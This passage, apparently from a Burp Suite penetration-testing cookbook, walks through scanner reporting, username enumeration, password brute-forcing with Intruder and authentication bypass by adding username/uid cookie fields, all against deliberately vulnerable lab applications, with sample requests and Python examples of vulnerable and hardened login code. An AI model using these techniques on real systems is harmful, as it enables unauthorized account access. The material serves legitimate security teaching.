exclamation point means it is a high severity and the confidence level is certain. 
For example, the SQL Injection issue shown here contains both of these 
attributes. 


Items with a lower severity or confidence level are shown as low or informational and colored yellow, gray, or black. These items require manual penetration testing to validate whether the vulnerability is present. For example, Input returned in response is a potential vulnerability identified by scanner and shown in the following screenshot. It could be an attack vector for cross-site scripting (XSS) or it could be a false positive. It is up to the penetration tester and their level of experience to validate such an issue:


[Screenshot: Issues panel listing SQL injection, Cross-site scripting (reflected), Cleartext submission of password, Password field with autocomplete enabled, Cookie without HttpOnly flag set, Input returned in response (reflected), Cross-domain Referer leakage, HTML does not specify charset [3], Frameable response (potential Clickjacking) [4], and Path-relative style sheet import [2]]


• Severity levels: The severity levels available include high, medium, low, information, and false positive. Any findings marked as false positive will not appear on the generated report. False positive is a severity level that must be manually set by the penetration tester on an issue.

• Confidence levels: The confidence levels available include certain, firm, and tentative.


Getting ready 


After the scanning process completes, we need to validate our findings, adjust 
severities accordingly, and generate our report. 


How to do it... 


1. For this recipe, select Cookie without HttpOnly flag set under the Issues 
heading: 


[Screenshot: Issues panel listing SQL injection, Cross-site scripting (reflected) [3], Cleartext submission of password, XPath injection, Password field with autocomplete enabled, Cookie without HttpOnly flag set, Input returned in response (reflected) [13], Cross-domain Referer leakage [3], HTML does not specify charset [6], Frameable response (potential Clickjacking) [8], Link manipulation (reflected) [2], and Path-relative style sheet import [2]]


2. Look at the Response tab of that message to validate the finding. We can clearly see the PHPSESSID cookie does not have the HttpOnly flag set. Therefore, we can change the severity from Low to High and the confidence level from Firm to Certain:


[Screenshot: Response | Raw tab]

HTTP/1.1 200 OK
Date: Tue, 28 Aug 2018 18:49:43 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=pn8ramiklkatSfm4mdrcis0beoS; path=/


3. Right-click the issue and change the severity to High by selecting Set 
severity | High: 


[Screenshot: right-click menu on Cookie without HttpOnly flag set in the Issues panel: Report issue, Set severity, Set confidence, Delete issue, View; the Set severity submenu shows Low, Information, False positive, and Restore original value]


4. Right-click the issue and change the confidence to Certain by selecting Set confidence | Certain:


[Screenshot: right-click menu on Cookie without HttpOnly flag set with the Set confidence submenu open, showing Certain, Firm, Tentative, and Restore original value; Issues help appears at the bottom of the menu]


5. For this recipe, select the issues with the highest confidence and severity 
levels to be included in the report. After selecting (highlighting + Shift key) 
the items shown here, right-click and select Report selected issues: 


[Screenshot: Issues panel with the selected issues highlighted and the right-click entry Report selected issues]


Upon clicking Report selected issues, a pop-up box appears prompting us 
for the format of the report. This pop-up is the Burp Scanner reporting 
wizard. 


6. For this recipe, allow the default setting of HTML. Click Next. 
7. This screen prompts for the types of details to be included in the report. For 
this recipe, allow the default settings. Click Next. 


8. This screen prompts for how messages should be displayed within the 
report. For this recipe, allow the default settings. Click Next. 

9. This screen prompts for which types of issues should be included in the 
report. For this recipe, allow the default settings. Click Next. 

10. This screen prompts for the location where the report should be saved. For this recipe, click Select file..., select a location, and provide a file name followed by the .html extension; allow all other default settings. Click Next:


[Screenshot: Burp Scanner reporting wizard. "Select the file where the report will be saved." Select file ...: \Burp_reports\Mutillidae_burp_report.html. "Specify the title and structure to use in the report." Report title: Burp Scanner Report; Issue organization: By type; Table of contents levels: 2; Summary table: All issues; Summary bar chart: High, medium and low issues; Embed images within HTML (requires modern browser): checked. Back and Next buttons]


11. This screen reflects the completion of the report generation. Click Close and browse to the saved location of the file.


12. Double-click the file name to load the report into a browser: 


[Screenshot: the generated HTML report, titled Burp Scanner Report, with the Burp Suite Professional logo]

Summary

The table below shows the numbers of issues identified in different categories. Issues are classified according to severity as High, Medium, Low or Information. This reflects the likely impact of each issue for a typical organization. Issues are also classified according to confidence as Certain, Firm or Tentative. This reflects the inherent reliability of the technique that was used to identify the issue.

[Summary table: Severity rows (High, Medium, Low, Information) by Confidence columns (Certain, Firm, Tentative, Total); the counts are not legible in the screenshot]

The chart below shows the aggregated numbers of issues identified in each category. Solid colored bars represent issues with a confidence level of Certain, and the bars fade as the confidence level falls.

[Summary bar chart: Number of issues by Severity (High, Medium, Low)]

Contents
1. SQL injection
2. Cross-site scripting (reflected)
2.1. http://192.168.56.101/mutillidae/includes/pop-up-help-context-generator.php [pagename parameter]
2.2. http://192.168.56.101/mutillidae/webservices/soap/ws-hello-world.php [name of an arbitrarily supplied URL parameter]
2.3. http://192.168.56.101/mutillidae/webservices/soap/ws-hello-world.php [name of an arbitrarily supplied URL parameter]
3. Cleartext submission of password
4. Cookie without HttpOnly flag set

Congratulations! You've created your first Burp report! 


Assessing Authentication Schemes 


In this chapter, we will cover the following recipes: 


Testing for account enumeration and guessable accounts 
Testing for weak lock-out mechanisms 

Testing for bypassing authentication schemes 

Testing for browser cache weaknesses 

Testing the account provisioning process via REST API 


Introduction 


This chapter covers the basic penetration testing of authentication schemes. 
Authentication is the act of verifying whether a person's or object's claim is 
true. Web penetration testers must make key assessments to determine the 
strength of a target application's authentication scheme. Such tests include 
launching attacks to determine the presence of account enumeration and 
guessable accounts, the presence of weak lock-out mechanisms, whether the 
authentication scheme can be bypassed, whether the application contains 
browser-caching weaknesses, and whether accounts can be provisioned without 
authentication via a REST API call. You will learn how to use Burp to perform 
such tests. 


Software tool requirements 


To complete the recipes in this chapter, you will need the following: 


OWASP Broken Web Applications (VM) 
OWASP Mutillidae link 
GetBoo link 
Burp Proxy Community or Professional (https://portswigger.net/burp/) 
The Firefox browser configured to allow Burp to proxy traffic 
(https://www.mozilla.org/en-US/firefox/new/) 


Testing for account enumeration and guessable accounts 


By interacting with an authentication mechanism, a tester may find it possible to 
collect a set of valid usernames. Once the valid accounts are identified, it may be 
possible to brute-force passwords. This recipe explains how Burp Intruder can be 
used to collect a list of valid usernames. 


Getting ready 


Perform username enumeration against a target application. 


How to do it... 


Ensure Burp and the OWASP BWA VM are running and that Burp is configured 
in the Firefox browser used to view the OWASP BWA applications. 


1. From the OWASP BWA Landing page, click the link to the GetBoo 
application: 


(Screenshot: the OWASP BWA Landing page section OLD (VULNERABLE) VERSIONS OF 
REAL APPLICATIONS, which contains the GetBoo link alongside applications such as 
WordPress, OrangeHRM, Gallery2, Tiki Wiki, Joomla and awstats.) 

2. Click the Log In button, and at the login screen, attempt to log in with an 
account username of admin and a password of aaaaa: 


(Screenshot: the GetBoo login form with Username admin, a masked Password and a 
Remember me checkbox. Below it: Use the account demo/demo for preview. New User? 
| Forgot password? | Activate Account.) 


3. Note the message returned is The password is invalid. From this 
information, we know admin is a valid account. Let's use Burp Intruder to 
find more accounts. 

4. In Burp's Proxy | HTTP history tab, find the failed login attempt message. 
View the Response | Raw tab to find the same overly verbose error 
message, The password is invalid: 


(Screenshot: Proxy | HTTP history with the POST to http://192.168.56.101 
selected (status 200, length 581, MIME type HTML); the Response | Raw tab shows:) 

HTTP/1.1 200 OK 
Date: Thu, 30 Aug 2018 19:13:30 GMT 
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1 
X-Powered-By: PHP/5.3.2-1ubuntu4.30 
Expires: Thu, 19 Nov 1981 08:52:00 GMT 
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 
Pragma: no-cache 
Vary: Accept-Encoding 
Content-Length: 46 
Connection: close 
Content-Type: text/html 

<p class="error">The password is invalid. </p> 


5. Flip back to the Request | Raw tab and right-click to send this request to 
Intruder: 


(Screenshot: the Request | Raw tab with the context menu open, offering Send to 
Spider, Do an active scan, Do a passive scan, Send to Intruder, Send to Repeater, 
Send to Sequencer, Send to Comparer, Send to Decoder and Show response in 
browser. The request shown is:) 

POST /getboo/login.php HTTP/1.1 
Host: 192.168.56.101 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 
Accept: */* 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http://192.168.56.101/getboo/login.php 
Content-Type: application/x-www-form-urlencoded 
X-Requested-With: XMLHttpRequest 
Content-Length: 78 
Cookie: PHPSESSID=g5qn9mlh5cdhu0dus3tqlqjm54; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada 
Connection: close 

token=51c089a9cc4d708119ab7827c47c633e&name=admin&pass=aaaaaa&submitted=Log+In 


6. Go to Burp's Intruder tab and leave the Intruder | Target tab settings as they 
are. Continue to the Intruder | Positions tab. Notice how Burp places 
payload markers around each parameter value found. However, we only 
need a payload marker around the password value. Click the Clear § button 
to remove the payload markers placed by Burp: 


(Screenshot: Intruder | Positions tab, attack type Sniper, showing the payload 
markers Burp placed automatically; the Add §, Clear §, Auto § and Refresh 
buttons are on the right and Start attack at the top. The marked request is:) 

POST /getboo/login.php HTTP/1.1 
Host: 192.168.56.101 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 
Accept: */* 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http://192.168.56.101/getboo/login.php 
Content-Type: application/x-www-form-urlencoded 
X-Requested-With: XMLHttpRequest 
Content-Length: 78 
Cookie: PHPSESSID=§g5qn9mlh5cdhu0dus3tqlqjm54§; acopendivids=§swingset,jotto,phpbb2,redmine§; acgroupswithpersist=§nada§ 
Connection: close 

token=§51c089a9cc4d708119ab7827c47c633e§&name=§admin§&pass=§aaaaaa§&submitted=§Log+In§ 


7. Then, highlight the name value of admin with your cursor and click the 
Add § button: 


(Screenshot: Intruder | Positions tab after Clear § and Add §. The headers are 
unchanged and the body now carries a single payload marker, around the name 
value:) 

token=51c089a9cc4d708119ab7827c47c633e&name=§admin§&pass=aaaaaa&submitted=Log+In 


8. Continue to the Intruder | Payloads tab. Many testers use word lists to 
enumerate commonly used usernames within the payload marker 
placeholder. For this recipe, we will type in some common usernames, to 
create a custom payload list. 

9. In the Payload Options [Simple list] section, type the string user and click 
the Add button: 


(Screenshot: the Intruder | Payloads tab. Payload Sets: Payload set 1, Payload 
type Simple list, Payload count 0, Request count 0. Payload Options [Simple 
list]: This payload type lets you configure a simple list of strings that are 
used as payloads; the Add button sits next to the new-item textbox, with Add 
from list ... below.) 


10. Add a few more strings such as john, tom, demo, and, finally, admin to the 
payload-listing box: 


(Screenshot: Payload Options [Simple list] with the Paste, Remove and Clear 
buttons, the Enter a new item textbox with its Add button, and Add from list 
... below.) 


11. Go to the Intruder | Options tab and scroll down to the Grep — Match 
section. Click the checkbox Flag result items with responses matching 
these expressions. Click the Clear button to remove the items currently in 
the list: 


(Screenshot: Intruder | Options, Grep - Match section. These settings can be 
used to flag result items containing specified expressions. The checkbox Flag 
result items with responses matching these expressions is followed by Burp's 
default list: error, exception, illegal, invalid, fail, stack, access, 
directory, file. Match type: Simple string or Regex; Case sensitive match; 
Exclude HTTP headers.) 


12. Click Yes to confirm you wish to clear the list. 

13. Type the string The password is invalid within the textbox and click the 
Add button. Your Grep — Match section should look as shown in the 
following screenshot: 


(Screenshot: Grep - Match with the checkbox Flag result items with responses 
matching these expressions ticked and the list containing the single entry The 
password is invalid; Paste, Load ..., Remove and Clear buttons on the left.) 


14. Click the Start attack button located at the top of the Options page. A pop- 
up dialog box appears displaying the payloads defined, as well as the new 
column we added under the Grep — Match section. This pop-up window is 
the attack results table. 

15. The attack results table shows that each request with the given payload 
resulted in a status code of 200 and that two of the payloads, john and tom, 
did not produce the message The password is invalid within the responses. 
Instead, those two payloads returned a message of The user does not exist: 


(Screenshot: the Intruder attack results table with columns Request, Payload, 
Status, Error, Timeout, Length, The password is invalid and Comment. Requests 0, 
1 (user), 4 (demo) and 5 (admin) return status 200 with length 581 and are 
flagged in the The password is invalid column; requests 2 (john) and 3 (tom) 
return status 200 but are not flagged.) 


16. This attack results table demonstrates a username enumeration 
vulnerability based upon the overly verbose error message The password is 
invalid, which confirms the user account exists on the system: 


(Screenshot: the attack results table, filter Showing all items, with request 5 
(admin) selected. Its Response | Raw tab shows the same response as before:) 

HTTP/1.1 200 OK 
Date: Thu, 30 Aug 2018 20:50:59 GMT 
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1 
X-Powered-By: PHP/5.3.2-1ubuntu4.30 
Expires: Thu, 19 Nov 1981 08:52:00 GMT 
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 
Pragma: no-cache 
Vary: Accept-Encoding 
Content-Length: 46 
Connection: close 
Content-Type: text/html 

<p class="error">The password is invalid. </p> 


This means we are able to confirm that accounts already exist in the system for 
the users user, demo, and admin. 
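The oracle this recipe exploits, as an added Python example (not code from the book or from GetBoo): a simulated login handler that answers differently for an unknown user and for a wrong password, beside a hardened one that does not, plus a replay of the payload list that reproduces the grep-match column offline. The user table, password hashes, salt and function names are constructed for this example.

```python
import hashlib
import hmac

# Constructed user table for the simulation (GetBoo's real store is not used).
_SALT = b"constructed-salt"


def _hash(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, 10_000)


USERS = {name: _hash(pw) for name, pw in
         [("user", "s3cret"), ("demo", "demo"), ("admin", "adm1n-pass")]}

# Hash of a throwaway password, so the unknown-user path does the same work
# as the known-user path instead of returning early.
_DUMMY = _hash("not-a-real-password")


def login_vulnerable(name: str, password: str) -> str:
    """Behaves like the GetBoo login in the recipe: the message says which of
    the two checks failed, so the response alone confirms a username."""
    if name not in USERS:
        return "The user does not exist."
    if not hmac.compare_digest(USERS[name], _hash(password)):
        return "The password is invalid."
    return "Welcome"


def login_hardened(name: str, password: str) -> str:
    """One message for both failures; the password is always hashed so the
    two paths also take comparable time."""
    stored = USERS.get(name, _DUMMY)
    ok = hmac.compare_digest(stored, _hash(password)) and name in USERS
    return "Welcome" if ok else "Invalid username or password."


def grep_match(login, payloads, expr="The password is invalid",
               password="aaaaaa") -> dict:
    """Replays the Intruder run: one login per payload, flagging responses
    that contain the grep string, like the column added in step 13."""
    return {p: expr in login(p, password) for p in payloads}


def leaks_usernames(login) -> bool:
    """The check a reviewer wants: do a known and an unknown username produce
    different responses for the same wrong password?"""
    return login("admin", "aaaaaa") != login("zzz-no-such-user", "aaaaaa")
```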


Testing for weak lock-out mechanisms 


Account lockout mechanisms should be present within an application to mitigate 
brute-force login attacks. Typically, applications set a threshold of three to 
five attempts. Many applications lock the account for a period of time before a 
re-attempt is allowed. 


Penetration testers must test all aspects of login protections, including challenge 
questions and responses, if present. 
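An added Python example (not from the book or from Mutillidae) of the lock-out the login tested in this recipe lacks: a per-account failure counter that locks the account after a threshold for a cool-down period, run against the same sequence of five wrong passwords followed by the payload list used later in the recipe. The credential store, the threshold value, the lock duration and the function names are this example's own choices.

```python
import time

MAX_ATTEMPTS = 5          # the text quotes three to five; five is this example's choice
LOCK_SECONDS = 15 * 60    # cool-down before another attempt is accepted (assumed)

# Constructed credential store holding the admin/admin pair from the recipe.
_CREDENTIALS = {"admin": "admin"}


def check_password(username: str, password: str) -> bool:
    return _CREDENTIALS.get(username) == password


def attempt_unguarded(username: str, password: str) -> str:
    """The behaviour observed in the recipe: every attempt is evaluated,
    however many have already failed."""
    return "ok" if check_password(username, password) else "invalid"


class LoginGuard:
    """Per-account consecutive-failure counter with a timed lock-out.
    The clock is injectable so the cool-down can be tested without sleeping."""

    def __init__(self, clock=time.monotonic):
        self._clock = clock
        self._failures = {}       # username -> consecutive failures
        self._locked_until = {}   # username -> clock value when the lock expires

    def is_locked(self, username: str) -> bool:
        until = self._locked_until.get(username)
        return until is not None and self._clock() < until

    def attempt(self, username: str, password: str) -> str:
        if self.is_locked(username):
            return "locked"          # the password is not evaluated while locked
        if check_password(username, password):
            self._failures.pop(username, None)
            return "ok"
        failures = self._failures.get(username, 0) + 1
        if failures >= MAX_ATTEMPTS:
            self._locked_until[username] = self._clock() + LOCK_SECONDS
            self._failures.pop(username, None)
            return "locked"
        self._failures[username] = failures
        return "invalid"


def run_guesses(attempt, username: str, guesses) -> list:
    """Replays a guess list in order and records each outcome."""
    return [attempt(username, g) for g in guesses]


# The recipe's sequence: five manual failures, then the Intruder payload list.
GUESSES = ["aaaaaa"] * 5 + ["admin123", "adminpass", "welcome1", "admin"]
```

With the guard in place the correct password in the last payload is never evaluated, because the account locked on the fifth failure; without it the ninth attempt succeeds.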


Getting ready 


Determine whether an application contains proper lock-out mechanisms in place. 
If they are not present, attempt to brute-force credentials against the login page 
to achieve unauthorized access to the application. Using the OWASP Mutillidae 
II application, attempt to log in five times with a valid username but an invalid 
password. 


How to do it... 


Ensure Burp and the OWASP BWA VM are running and that Burp is configured 
in the Firefox browser used to view the OWASP BWA applications. 


1. From the OWASP BWA Landing page, click the link to the OWASP 
Mutillidae II application. 

2. Open the Firefox browser to the login screen of OWASP Mutillidae II. 
From the top menu, click Login. 

3. At the login screen, attempt to log in five times with username admin and 
the wrong password of aaaaaa. Notice the application does not react any 
differently during the five attempts. The application does not change the 
error message shown, and the admin account is not locked out. This means 
the login is probably susceptible to brute-force password-guessing attacks: 


(Screenshot: the Mutillidae Please sign-in form with Username admin and a 
masked Password; Back and Help Me! buttons above; Dont have an account? Please 
register here below.) 


Let's continue the testing to brute-force the login page and gain 
unauthorized access to the application. 


4. Go to the Proxy | HTTP history tab, and look for the failed login attempts. 
Right-click one of the five requests and send it to Intruder: 


(Screenshot: Proxy | HTTP history with one of the failed POST requests to 
/mutillidae/index.php?page=login.php selected (status 200, length 50762, MIME 
type HTML) and the context menu open on Send to Intruder. The request is:) 

POST /mutillidae/index.php?page=login.php HTTP/1.1 
Host: 192.168.56.101 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http://192.168.56.101/mutillidae/index.php?page=login.php 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 60 
Cookie: showhints=1; PHPSESSID=g5qn9mlh5cdhu0dus3tqlqjm54; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada 
Connection: close 
Upgrade-Insecure-Requests: 1 

username=admin&password=aaaaaa&login-php-submit-button=Login 


5. Go to Burp's Intruder tab, and leave the Intruder | Target tab settings as they 
are. Continue to the Intruder | Positions tab and notice how Burp places 
payload markers around each parameter value found. However, we only 
need a payload marker around the password's value. Click the Clear 
§ button to remove the payload markers placed by Burp: 


(Screenshot: Intruder | Positions tab, attack type Sniper, showing the payload 
markers Burp placed automatically:) 

POST /mutillidae/index.php?page=§login.php§ HTTP/1.1 
Host: 192.168.56.101 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http://192.168.56.101/mutillidae/index.php?page=login.php 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 60 
Cookie: showhints=§1§; PHPSESSID=§g5qn9mlh5cdhu0dus3tqlqjm54§; acopendivids=§swingset,jotto,phpbb2,redmine§; acgroupswithpersist=§nada§ 
Connection: close 
Upgrade-Insecure-Requests: 1 

username=§admin§&password=§aaaaaa§&login-php-submit-button=§Login§ 


6. Then, highlight the password value of aaaaaa and click the Add § button. 

7. Continue to the Intruder | Payloads tab. Many testers use word lists to 
brute-force commonly used passwords within the payload marker 
placeholder. For this recipe, we will type in some common passwords to 
create our own unique list of payloads. 

8. In the Payload Options [Simple list] section, type the string admin123 and 
click the Add button: 


(Screenshot: Payload Options [Simple list]: This payload type lets you configure 
a simple list of strings that are used as payloads.) 


9. Add a few more strings, such as adminpass, welcome1, and, finally, admin 
to the payload-listing box: 


(Screenshot: Payload Options [Simple list] now listing admin123, adminpass and 
welcome1, with Add from list ... below.) 


10. Go to the Intruder | Options tab and scroll down to the Grep — Extract 
section: 


(Screenshot: the Grep - Extract section. These settings can be used to extract 
useful information from responses into the attack results table. Checkbox: 
Extract the following items from responses.) 


11. Click the checkbox Extract the following items from responses and then 
click the Add button. A pop-up box appears, displaying the response of the 
unsuccessful login attempt you made with the admin/aaaaaa request. 

12. In the search box at the bottom, search for the words Not Logged In. After 
finding the match, you must highlight the words Not Logged In, to assign 
the grep match correctly: 


(Screenshot: the Define extract grep item dialog. Define the location of the 
item to be extracted. Selecting the item in the response panel will create a 
suitable configuration automatically. You can also modify the configuration 
manually to ensure it works effectively. Options: Define start and end or 
Extract from regex group; Start after expression (or Start at offset); End at 
delimiter: </span> (or End at fixed length); Case sensitive match; Exclude HTTP 
headers; Update config based on selection below; Refetch response; Maximum 
capture length: 100. The response panel shows the Mutillidae header row:) 

<span class="version-header">Version: 2.6.24</span> 
<span id="idSecurityLevelHeading" class="version-header" style="margin-left: 20px;">Security Level: 0 (Hosed)</span> 
<span id="idHintsStatusHeading" CookieTamperingAffectedArea="1" class="version-header" style="margin-left: 20px;">Hints: Enabled (1 - Script Kiddie)</span> 

(followed by a fourth span carrying the attribute ReflectedXSSExecutionPoint="1", 
which holds the Not Logged In text to highlight.) 


13. If you do not highlight the words properly, after you click OK, you will see 
[INVALID] inside the Grep — Extract box. If this happens, remove the 
entry by clicking the Remove button and try again by clicking the Add 
button, perform the search, and highlight the words. 

14. If you highlight the words properly, you should see the following in the 
Grep — Extract box: 


(Screenshot: the Grep - Extract section with the checkbox Extract the following 
items from responses ticked and the new item listed.) 


15. Now, click the Start attack button at the top right-hand side of the Options 
page. 

16. A pop-up attack results table appears, displaying the request with the 
payloads you defined placed into the payload marker positions. Notice the 
attack table produced shows an extra column entitled 
ReflectedXSSExecution. This column is a result of the Grep — Extract 
option set previously. 


17. From this attack table, viewing the additional column, a tester can easily 
identify which request number successfully brute-forced the login screen. In 
this case, Request 4, using credentials of the username admin and the 
password admin logged us into the application: 


(Screenshot: the Intruder attack results table, filter Showing all items:) 

Request  Payload    Status  Length  ReflectedXSSExecution... 
0                   200     50762   Not Logged In 
1        admin123   200     50762   Not Logged In 
2        adminpass  200     50762   Not Logged In 
3        welcome1   200     50762   Not Logged In 
4        admin      302     50905   Logged In Admin: <span... 


18. Select Request 4 within the attack table, and view the Response | Render 
tab. You should see the message Logged In Admin: admin (g0t r00t?) on 
the top right-hand side: 


(Screenshot: the same attack table with Request 4 (payload admin, status 302, 
length 50905) selected; the Response | Render tab below shows the page rendered 
as logged in.) 


19. Close the attack table by clicking the X in the top right-hand corner. 


You successfully brute-forced the password of a valid account on the system, 
due to the application having a weak lock-out mechanism. 


Testing for bypassing authentication schemes 


Applications may contain flaws, allowing unauthorized access by means of 
bypassing the authentication measures in place. Bypassing techniques include a 
direct page request (that is, forced browsing), parameter modification, 
session ID prediction, and SQL Injection. 


For the purposes of this recipe, we will use parameter modification. 


Getting ready 


Add and edit parameters in an unauthenticated request to match a previously 
captured authenticated request. Replay the modified, unauthenticated request to 
gain access to the application through bypassing the login mechanism. 
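Why the parameter modification in this recipe works, as an added Python example (not code from the book or from Mutillidae): a resolver that trusts the username and uid fields carried in the Cookie header, beside one that looks the identity up in a server-side session store keyed by PHPSESSID. The session ids, the store, the cookie strings and the function names are constructed for this example.

```python
# Constructed server-side session store: PHPSESSID -> attributes recorded by a
# real login.  Anything not recorded here was never authenticated.
SESSIONS = {
    "sess-anon-0001": {},                                # browsed, never logged in
    "sess-admin-0002": {"username": "admin", "uid": 1},  # written by an actual login
}


def parse_cookie(header: str) -> dict:
    """Minimal Cookie header parser: name=value pairs separated by ';'."""
    out = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            out[name] = value
    return out


def current_user_vulnerable(cookie_header: str):
    """Reads the identity straight from the client-supplied cookie, which is
    why pasting 'username=admin; uid=1' into an anonymous request works."""
    c = parse_cookie(cookie_header)
    if "username" in c and "uid" in c and c["uid"].isdigit():
        return {"username": c["username"], "uid": int(c["uid"])}
    return None


def current_user_hardened(cookie_header: str):
    """Only the session id is taken from the client; who that session belongs
    to comes from the server-side record written at login time."""
    c = parse_cookie(cookie_header)
    session = SESSIONS.get(c.get("PHPSESSID", ""), {})
    if "username" in session:
        return {"username": session["username"], "uid": session["uid"]}
    return None


# Constructed headers mirroring the recipe (the session ids are placeholders,
# not the values in the screenshots).
UNAUTH = ("showhints=1; PHPSESSID=sess-anon-0001; "
          "acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada")
# The unauthenticated cookie with the authenticated request's fields pasted in.
PASTED = ("showhints=1; username=admin; uid=1; PHPSESSID=sess-anon-0001; "
          "acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada")
# A cookie from a browser that really logged in as admin.
REAL_ADMIN = "showhints=1; PHPSESSID=sess-admin-0002"
```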


How to do it... 


1. Open the Firefox browser to the home page of OWASP Mutillidae II, using 
the Home button from the top menu, on the left-hand side. Make sure you 
are not logged into the application. If you are logged in, select Logout from 
the menu: 


(Screenshot: the OWASP Mutillidae II: Web Pwn in Mass Production home page 
header showing Version: 2.6.24 Security Level: 0 (Hosed) Hints: Enabled (1 - 
Script Kiddie) Not Logged In, and the menu Home, Login/Register, Toggle Hints, 
Show Popup Hints, Toggle Security, Enforce SSL, Reset DB, View Log, View 
Captured Data.) 


2. In Burp, go to the Proxy | HTTP history tab and select the request you just 
made, browsing to the home page as unauthenticated. Right-click, and then 
select Send to Repeater: 


(Screenshot: Proxy | HTTP history with request 272, the unauthenticated GET to 
the home page (status 200, length 46441), selected and the context menu open on 
Send to Repeater. The request is:) 

GET /mutillidae/index.php?page=home.php&popUpNotificationCode=HPH0 HTTP/1.1 
Host: 192.168.56.101 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http://192.168.56.101/mutillidae/index.php?page=home.php&popUpNotificationCode=HPH0 
Cookie: showhints=1; PHPSESSID=g5qn9mlh5cdhu0dus3tqlqjm54; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada 
Connection: close 
Upgrade-Insecure-Requests: 1 


3. Using this same request and location, right-click again, and then select 
Send to Comparer (request): 


(Screenshot: the same unauthenticated GET request in Proxy | HTTP history with 
the context menu open on Send to Comparer.) 


4. Return to the home page of your browser and click the Login/Register 
button. At the login page, log in with the username of admin and the 
password of admin. Click Login. 

5. After you log in, go ahead and log out. Make sure you press the Logout 
button and are logged out of the admin account. 


6. In Burp, go to the Proxy | HTTP history tab and select the request you just 
made, logging in as admin. Select the GET request immediately following the 
POST 302 redirect. Right-click and then select Send to Repeater (request): 


(Screenshot: Proxy | HTTP history showing request 273, GET 
/mutillidae/index.php?page=login.php (status 200, length 50789), request 274, 
POST /mutillidae/index.php?page=login.php (status 302, length 50905), and the 
GET that follows, selected with the context menu open. The selected request 
is:) 

GET /mutillidae/index.php?popUpNotificationCode=AU1 HTTP/1.1 
Host: 192.168.56.101 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http://192.168.56.101/mutillidae/index.php?page=login.php 
Cookie: showhints=1; username=admin; uid=1; PHPSESSID=g5qn9mlh5cdhu0dus3tqlqjm54; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada 
Connection: close 
Upgrade-Insecure-Requests: 1 


7. Using this same request and location, right-click again and Send to 
Comparer (request): 


(Screenshot: the same authenticated GET request in Proxy | HTTP history with the 
context menu open on Send to Comparer.) 


8. Go to Burp's Comparer tab. Notice the two requests you sent are 
highlighted. Press the Words button on the bottom right-hand side, to 
compare the two requests at the same time: 


(Screenshot: the Comparer tab. This function lets you do a word- or byte-level 
comparison between different data. You can load, paste, or send data here from 
other tools and then select the comparison you want to perform. Both requests 
are listed in the Select item 1 and Select item 2 panes: the unauthenticated GET 
/mutillidae/index.php?page=home.php&popUpNotificationCode=HPH0 and the 
authenticated GET /mutillidae/index.php?popUpNotificationCode=AU1. The Words 
and Bytes compare buttons are at the bottom right.) 


9. A dialog pop-up displays the two requests with color-coded highlights to 
draw your eyes to the differences. Note the changes in the Referer header 
and the additional name/value pair placed in the admin account cookie. 
Close the pop-up box with the X on the right-hand side: 


(Screenshot: the Comparer word-level diff of the two requests, lengths 603 and 
585, with Modified, Deleted and Added highlights. The request line, the Referer 
header and the Cookie header differ; the authenticated request's cookie carries 
the additional username=admin; uid=1 pair. A Sync views checkbox sits at the 
bottom.) 


10. Return to Repeater, which contains your first GET request you performed as 
unauthenticated. Prior to performing this attack, make sure you are 
completely logged out of the application. 


11. You can verify you are logged out by clicking the Go button in Repeater 
associated to your unauthenticated request: 


